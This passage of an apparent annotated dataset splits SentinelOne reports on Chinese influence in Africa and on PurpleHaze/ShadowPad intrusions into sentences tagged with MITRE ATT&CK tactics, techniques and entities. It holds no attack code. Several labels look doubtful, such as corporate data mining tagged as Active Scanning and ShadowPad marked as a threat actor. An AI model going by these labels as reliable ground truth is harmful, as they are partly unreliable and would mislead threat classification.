initial construction.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s38-56d3b1", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "Notably, the network infrastructure and services were reportedly Huawei technology since the initial construction.", "sentence_text": "In this intrusion, Bronze President was observed exfiltrating surveillance footage from the AU headquarters facility.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1125", "name": "Video Capture" } ], "procedure": "Exfiltrating surveillance footage", "entities": [ { "text": "Bronze President", "start": 19, "end": 35, "label": "ThreatActor" }, { "text": "exfiltrating surveillance footage", "start": 49, "end": 82, "label": "Action" }, { "text": "AU headquarters facility", "start": 92, "end": 116, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-59_SentinelOne_report-p1-s39-dce2f6", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "In this intrusion, Bronze President was observed exfiltrating surveillance footage from the AU headquarters facility.", "sentence_text": "This case may highlight how much of a real priority intelligence inside the AU is to Beijing, ultimately forcing their hand on moving away from backdoored equipment to performing actual intrusions through well tracked APTs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s40-76b4a3", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "This case may highlight how much of a real priority intelligence inside the AU is to Beijing, ultimately forcing their hand on moving away from backdoored equipment to performing actual intrusions through well tracked APTs.", "sentence_text": "In both the 2017 and 2020 case, African Union and Chinese officials denied any sort of intrusions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s41-6ccc17", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 41, "context_before": "In both the 2017 and 2020 case, African Union and Chinese officials denied any sort of intrusions.", "sentence_text": "A review of specifics around China’s technological soft power in Africa highlights some reasons why the official may have said that.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s42-415c82", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 42, "context_before": "A review of specifics around China’s technological soft power in Africa highlights some reasons why the official may have said that.", "sentence_text": "These corporations have brought the boon of digital connectivity to the remotest corners of Africa.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s43-0f5057", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 43, "context_before": "These corporations have brought the boon of digital connectivity to the remotest corners of Africa.", "sentence_text": "In the two decades since Huawei began expanding into Africa, it has grown to become the leading telecommunication technology and service provider across much of the continent.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s44-c5c8cf", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 44, "context_before": "In the two decades since Huawei began expanding into Africa, it has grown to become the leading telecommunication technology and service provider across much of the continent.", "sentence_text": "Yet, underneath the altruistic veneer may lie a strategy anchored on fostering an overwhelming dependence on Chinese technology.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s45-5d5284", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 45, "context_before": "Yet, underneath the altruistic veneer may lie a strategy anchored on fostering an overwhelming dependence on Chinese technology.", "sentence_text": "This rise isn’t merely a route to economic enrichment; it empowers China to shape policies and narratives aligned with its geostrategic ambitions, establishing itself as a pivotal and defining force in Africa’s digital evolution.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s46-d43c5e", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 46, "context_before": "This rise isn’t merely a route to economic enrichment; it empowers China to shape policies and narratives aligned with its geostrategic ambitions, establishing itself as a pivotal and defining force in Africa’s digital evolution.", "sentence_text": "Targeted intrusions by the BackdoorDiplomacy APT and the threat group orchestrating Operation Tainted Love indicate a level intention directed at supporting such agendas.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s47-5885e2", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 47, "context_before": "Targeted intrusions by the BackdoorDiplomacy APT and the threat group orchestrating Operation Tainted Love indicate a level intention directed at supporting such agendas.", "sentence_text": "China has also ventured to enhance its command over the underwater fiber networks connected to the African continent.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s48-ede4bf", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 48, "context_before": "China has also ventured to enhance its command over the underwater fiber networks connected to the African continent.", "sentence_text": "These underwater pathways hold enormous significance in dictating the flow of information between continents.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s49-469c90", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 49, "context_before": "These underwater pathways hold enormous significance in dictating the flow of information between continents.", "sentence_text": "Controlling these undersea networks gives China the capacity to monitor the data flowing through them, raising serious concerns regarding data privacy and national sovereignty.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s50-cb6194", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 50, "context_before": "Controlling these undersea networks gives China the capacity to monitor the data flowing through them, raising serious concerns regarding data privacy and national sovereignty.", "sentence_text": "With 51 million users processing over $314 billion in transactions annually, its footprint is substantial.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s51-17fa04", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 51, "context_before": "With 51 million users processing over $314 billion in transactions annually, its footprint is substantial.", "sentence_text": "M-Pesa has since been migrated to Huawei’s Mobile Money Platform.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s52-6ec268", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 52, "context_before": "M-Pesa has since been migrated to Huawei’s Mobile Money Platform.", "sentence_text": "This should raise apprehensions around the nature of China’s influence, with potential avenues for financial monopolies and the control it gives to Chinese stakeholders in the dictation of economic trajectories across the African continent.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s53-83d687", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 53, "context_before": "This should raise apprehensions around the nature of China’s influence, with potential avenues for financial monopolies and the control it gives to Chinese stakeholders in the dictation of economic trajectories across the African continent.", "sentence_text": "The intensive data mining, user surveillance, and user disruption that are characteristic of Chinese tech giants present a significant risk of exploitation, infringing upon the privacy rights of individuals and potentially undermining the sovereignty of African nations.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" }, { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1595", "name": "Active Scanning" }, { "id": "T1650", "name": "Acquire Access" } ], "procedure": "Monitoring user's data present a risk of exploitation and violate privacy rights", "entities": [ { "text": "Chinese tech giants", "start": 93, "end": 112, "label": "Infrastructure_Indicator" }, { "text": "data mining", "start": 14, "end": 25, "label": "Action" }, { "text": "user surveillance", "start": 27, "end": 44, "label": "Action" }, { "text": "user disruption", "start": 50, "end": 65, "label": "Action" }, { "text": "exploitation", "start": 143, "end": 155, "label": "Action" }, { "text": "infringing upon the privacy rights of individuals", "start": 157, "end": 206, "label": "Action" } ] }, { "uid": "sentinel-59_SentinelOne_report-p1-s54-265400", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 54, "context_before": "The intensive data mining, user surveillance, and user disruption that are characteristic of Chinese tech giants present a significant risk of exploitation, infringing upon the privacy rights of individuals and potentially undermining the sovereignty of African nations.", "sentence_text": "Financial inclusion and potential manipulation hang in a precarious balance, necessitating a critical appraisal of the long-term implications of this growing influence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s55-eab500", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 55, "context_before": "Financial inclusion and potential manipulation hang in a precarious balance, necessitating a critical appraisal of the long-term implications of this growing influence.", "sentence_text": "Surveillance\nHuawei’s Smart City venture is also emerging as a central pillar in China’s escalating soft power influence in Africa.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s56-efc6e8", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 56, "context_before": "Surveillance\nHuawei’s Smart City venture is also emerging as a central pillar in China’s escalating soft power influence in Africa.", "sentence_text": "Yet, the flipside of this technological investment is the possibility of a surveillance era of unparalleled scope, exploiting a diverse array of data from daily life to cultivate a society where personal privacy could soon become obsolete.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s57-26ab10", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 57, "context_before": "Yet, the flipside of this technological investment is the possibility of a surveillance era of unparalleled scope, exploiting a diverse array of data from daily life to cultivate a society where personal privacy could soon become obsolete.", "sentence_text": "In Kenya, the Safe City project — powered by Huawei’s system encompassing CCTV and facial recognition technologies — monitors Nairobi and other primary cities.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1125", "name": "Video Capture" } ], "procedure": "Monitor cities via systems", "entities": [ { "text": "Kenya", "start": 3, "end": 8, "label": "Infrastructure_Indicator" }, { "text": "Huawei’s system encompassing CCTV", "start": 45, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "monitors Nairobi and other primary cities", "start": 117, "end": 158, "label": "Action" } ] }, { "uid": "sentinel-59_SentinelOne_report-p1-s58-3645c9", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 58, "context_before": "In Kenya, the Safe City project — powered by Huawei’s system encompassing CCTV and facial recognition technologies — monitors Nairobi and other primary cities.", "sentence_text": "These same capabilities can be found in many other countries throughout Africa.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s59-ffb509", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 59, "context_before": "These same capabilities can be found in many other countries throughout Africa.", "sentence_text": "Other noteworthy activity includes the Chinese business CloudWalk Technology providing facial recognition surveillance technology to Zimbabwe .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s60-cf0c5d", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 60, "context_before": "Other noteworthy activity includes the Chinese business CloudWalk Technology providing facial recognition surveillance technology to Zimbabwe .", "sentence_text": "Moreover, these nations steer towards further reliance on Chinese expertise and technical resources for the use and administration of these systems into the future.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s61-3bb1fa", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 61, "context_before": "Moreover, these nations steer towards further reliance on Chinese expertise and technical resources for the use and administration of these systems into the future.", "sentence_text": "A Force for Good African nations face the delicate task of leveraging Chinese tech innovations while preserving their autonomy and digital rights, a tightrope walk exacerbated by limited alternatives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s62-60729a", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 62, "context_before": "A Force for Good African nations face the delicate task of leveraging Chinese tech innovations while preserving their autonomy and digital rights, a tightrope walk exacerbated by limited alternatives.", "sentence_text": "Concurrently, it’s imperative for the cybersecurity community to deepen our understanding of China’s cyber activities in Africa to prevent unwanted encroachment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s63-e43214", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 63, "context_before": "Concurrently, it’s imperative for the cybersecurity community to deepen our understanding of China’s cyber activities in Africa to prevent unwanted encroachment.", "sentence_text": "Due to escalating cyber threats in overlooked areas such as Africa and Latin America, we are launching the Undermonitored Regions Working Group (URWG).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s64-87a40c", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 64, "context_before": "Due to escalating cyber threats in overlooked areas such as Africa and Latin America, we are launching the Undermonitored Regions Working Group (URWG).", "sentence_text": "This initiative is focused on addressing the unique cybersecurity hurdles faced in these regions, frequently sidelined in mainstream global cyber discussions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s65-4b21ef", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 65, "context_before": "This initiative is focused on addressing the unique cybersecurity hurdles faced in these regions, frequently sidelined in mainstream global cyber discussions.", "sentence_text": "By pooling our knowledge and technical prowess, we strive to nurture a digital future in support of less monitored parts of the world.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s66-a5ccb8", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 66, "context_before": "By pooling our knowledge and technical prowess, we strive to nurture a digital future in support of less monitored parts of the world.", "sentence_text": "Recognizing Africa’s centrality in the future of global cyber dynamics helps not only the safeguarding of the continent’s digital freedoms but fortifies the global ecosystem against sophisticated threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s67-0d556b", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 67, "context_before": "Recognizing Africa’s centrality in the future of global cyber dynamics helps not only the safeguarding of the continent’s digital freedoms but fortifies the global ecosystem against sophisticated threat actors.", "sentence_text": "Tom's dedication lies in driving cutting-edge cyber threat intelligence and research, collaborating with top-tier analysts and organizations worldwide.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s68-5ce5f9", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 68, "context_before": "Tom's dedication lies in driving cutting-edge cyber threat intelligence and research, collaborating with top-tier analysts and organizations worldwide.", "sentence_text": "His work has led to the discovery of new mercenary groups, emerging geopolitical cyber campaigns, and critical insights into global conflicts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s69-bf11f0", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 69, "context_before": "His work has led to the discovery of new mercenary groups, emerging geopolitical cyber campaigns, and critical insights into global conflicts.", "sentence_text": "Prev\nCapraTube | Transparent Tribe’s CapraRAT Mimics YouTube to Hijack Android Phones Next Sandman APT | A Mystery Group Targeting Telcos with a LuaJIT Toolkit Related Posts PhantomCaptcha | Multi-Stage WebSocket RAT Targets Ukraine in Single-Day Spearphishing Operation October 22 2025 Contagious Interview | North Korean Threat Actors Reveal Plans and Ops by Abusing Cyber Intel Platforms September 04 2025 Top Tier Target", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s70-6b5b36", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 70, "context_before": "Prev\nCapraTube | Transparent Tribe’s CapraRAT Mimics YouTube to Hijack Android Phones Next Sandman APT | A Mystery Group Targeting Telcos with a LuaJIT Toolkit Related Posts PhantomCaptcha | Multi-Stage WebSocket RAT Targets Ukraine in Single-Day Spearphishing Operation October 22 2025 Contagious Interview | North Korean Threat Actors Reveal Plans and Ops by Abusing Cyber Intel Platforms September 04 2025 Top Tier Target", "sentence_text": "| What It Takes to Defend a Cybersecurity Company from Today’s Adversaries April 28 2025", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s1-ddb062", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "At the beginning of 2025, we also identified and helped disrupt an intrusion linked to a wider ShadowPad operation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s2-9f7226", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "At the beginning of 2025, we also identified and helped disrupt an intrusion linked to a wider ShadowPad operation.", "sentence_text": "The affected organization was responsible for managing hardware logistics for SentinelOne employees at the time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s3-a3c90c", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "The affected organization was responsible for managing hardware logistics for SentinelOne employees at the time.", "sentence_text": "A thorough investigation of SentinelOne’s infrastructure, software, and hardware assets confirmed that the attackers were unsuccessful and SentinelOne was not compromised by any of these activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s4-d149c3", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "A thorough investigation of SentinelOne’s infrastructure, software, and hardware assets confirmed that the attackers were unsuccessful and SentinelOne was not compromised by any of these activities.", "sentence_text": "The PurpleHaze and ShadowPad activity clusters span multiple partially related intrusions into different targets occurring between July 2024 and March 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s5-5070dd", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "The PurpleHaze and ShadowPad activity clusters span multiple partially related intrusions into different targets occurring between July 2024 and March 2025.", "sentence_text": "We attribute the PurpleHaze and ShadowPad activity clusters with high confidence to China-nexus threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s6-963a1a", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "We attribute the PurpleHaze and ShadowPad activity clusters with high confidence to China-nexus threat actors.", "sentence_text": "We loosely associate some PurpleHaze intrusions with actors that overlap with the suspected Chinese cyberespionage groups publicly reported as APT15 and UNC5174.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s7-50927d", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "We loosely associate some PurpleHaze intrusions with actors that overlap with the suspected Chinese cyberespionage groups publicly reported as APT15 and UNC5174.", "sentence_text": "This research underscores the persistent threat Chinese cyberespionage actors pose to global industries and public sector organizations, while also highlighting a rarely discussed target they pursue: cybersecurity vendors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s8-58fa10", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "This research underscores the persistent threat Chinese cyberespionage actors pose to global industries and public sector organizations, while also highlighting a rarely discussed target they pursue: cybersecurity vendors.", "sentence_text": "Overview\nThis research outlines threats that SentinelLABS observed and defended against in late 2024 and the first quarter of 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s9-d692a6", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "Overview\nThis research outlines threats that SentinelLABS observed and defended against in late 2024 and the first quarter of 2025.", "sentence_text": "This research focuses specifically on the subset of threats targeting SentinelOne and others that we attribute to China-nexus threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s10-1f96da", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "This research focuses specifically on the subset of threats targeting SentinelOne and others that we attribute to China-nexus threat actors.", "sentence_text": "By disclosing details of the threat activities we have faced, we bring into focus an aspect of the threat landscape that has received limited attention in public cyber threat intelligence discourse: the targeting of cybersecurity vendors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s11-5f56d5", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "By disclosing details of the threat activities we have faced, we bring into focus an aspect of the threat landscape that has received limited attention in public cyber threat intelligence discourse: the targeting of cybersecurity vendors.", "sentence_text": "Our objective is to contribute to strengthening industry defenses by promoting transparency and encouraging collaboration.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s12-edac25", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "Our objective is to contribute to strengthening industry defenses by promoting transparency and encouraging collaboration.", "sentence_text": "The findings detailed in this post highlight the persistent interest of China-nexus actors in these organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s13-4ba260", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "The findings detailed in this post highlight the persistent interest of China-nexus actors in these organizations.", "sentence_text": "Extensive remote reconnaissance of SentinelOne servers intentionally reachable from the Internet by virtue of their functionality.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1595", "name": "Active Scanning" } ], "procedure": "Performed extensive remote reconnaissance of SentinelOne servers exposed to the Internet.", "entities": [ { "text": "Extensive remote reconnaissance of SentinelOne servers", "start": 0, "end": 54, "label": "Action" }, { "text": "SentinelOne servers", "start": 35, "end": 54, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s14-dc7a08", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "Extensive remote reconnaissance of SentinelOne servers intentionally reachable from the Internet by virtue of their functionality.", "sentence_text": "We promptly informed the IT services and logistics organization of the intrusion details.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s15-29e446", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "We promptly informed the IT services and logistics organization of the intrusion details.", "sentence_text": "At this point, it remains unclear whether the perpetrators’ focus was solely on the targeted IT logistics organization or if they intended to extend their reach to downstream organizations as well.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s16-217ad4", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "At this point, it remains unclear whether the perpetrators’ focus was solely on the targeted IT logistics organization or if they intended to extend their reach to downstream organizations as well.", "sentence_text": "As for the reconnaissance activity, we promptly identified and mapped the threat actor’s infrastructure involved in this operation as soon as it began.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s17-4d8882", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "As for the reconnaissance activity, we promptly identified and mapped the threat actor’s infrastructure involved in this operation as soon as it began.", "sentence_text": "A thorough investigation of SentinelOne servers probed by the attackers revealed no signs of compromise.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s18-c070d2", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "A thorough investigation of SentinelOne servers probed by the attackers revealed no signs of compromise.", "sentence_text": "We assess with high confidence that the threat actor’s activities were limited to mapping and evaluating the availability of select Internet-facing servers, likely in preparation for potential future actions.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1590", "name": "Gather Victim Network Information" } ], "procedure": "Mapping and rating the availability of select internet-facing servers", "entities": [ { "text": "mapping ", "start": 82, "end": 90, "label": "Action" }, { "text": "evaluating the availability of select Internet-facing servers", "start": 94, "end": 155, "label": "Action" }, { "text": "Internet-facing servers", "start": 132, "end": 155, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s19-738867", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "We assess with high confidence that the threat actor’s activities were limited to mapping and evaluating the availability of select Internet-facing servers, likely in preparation for potential future actions.", "sentence_text": "Continuous monitoring of network traffic to our servers, which is part of established and continuing practice for protecting SentinelOne assets exposed to the Internet, enabled rapid detection and increased scrutiny to the reconnaissance activities, effectively mitigating any potential risks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s20-9d5514", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "Continuous monitoring of network traffic to our servers, which is part of established and continuing practice for protecting SentinelOne assets exposed to the Internet, enabled rapid detection and increased scrutiny to the reconnaissance activities, effectively mitigating any potential risks.", "sentence_text": "Further investigations uncovered multiple, partially related intrusions and clusters of activity characteristic of modern Chinese-nexus operations:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s21-f0dc3a", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "Further investigations uncovered multiple, partially related intrusions and clusters of activity characteristic of modern Chinese-nexus operations:", "sentence_text": "Activity A: June 2024 intrusion into a South Asian government entity Activity B: A set of intrusions impacting organizations worldwide occurring between July 2024 and March 2025 Activity C: Intrusion into an IT services and logistics company at the beginning of 2025 Activity D: October 2024 intrusion into the same government entity compromised in June 2024 Activity E: October 2024 reconnaissance activity targeting SentinelOne Activity F: September 2024 intrusion into a leading European media organization The next two sections provide an overview of these activities, including timelines, points of overlap, and our attribution assessments, followed by concrete technical details, such as observed TTPs, malware, and infrastructure to enable other organizations in related sectors to investigate and mitigate similar sets of activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s22-f62cbf", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "Activity A: June 2024 intrusion into a South Asian government entity Activity B: A set of intrusions impacting organizations worldwide occurring between July 2024 and March 2025 Activity C: Intrusion into an IT services and logistics company at the beginning of 2025 Activity D: October 2024 intrusion into the same government entity compromised in June 2024 Activity E: October 2024 reconnaissance activity targeting SentinelOne Activity F: September 2024 intrusion into a leading European media organization The next two sections provide an overview of these activities, including timelines, points of overlap, and our attribution assessments, followed by concrete technical details, such as observed TTPs, malware, and infrastructure to enable other organizations in related sectors to investigate and mitigate similar sets of activity.", "sentence_text": "Overview | ShadowPad Intrusions In June 2024, SentinelLABS observed threat actor activity involving the ShadowPad malware targeting a South Asian government entity that provides IT solutions and infrastructure across multiple sectors (Activity A).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s23-bd4aa8", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "Overview | ShadowPad Intrusions In June 2024, SentinelLABS observed threat actor activity involving the ShadowPad malware targeting a South Asian government entity that provides IT solutions and infrastructure across multiple sectors (Activity A).", "sentence_text": "The ShadowPad sample we retrieved was obfuscated using a variant of ScatterBrain , an evolution of the ScatterBee obfuscation mechanism.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Obfuscated files (malware)", "entities": [ { "text": "ShadowPad", "start": 4, "end": 13, "label": "ThreatActor" }, { "text": "obfuscated ", "start": 38, "end": 49, "label": "Action" }, { "text": "ScatterBrain ", "start": 68, "end": 81, "label": "MalwareTool" }, { "text": "ScatterBee obfuscation mechanism", "start": 103, "end": 135, "label": "MalwareTool" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s24-7d9771", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "The ShadowPad sample we retrieved was obfuscated using a variant of ScatterBrain , an evolution of the ScatterBee obfuscation mechanism.", "sentence_text": "Using C2 netflow and SentinelOne telemetry data, 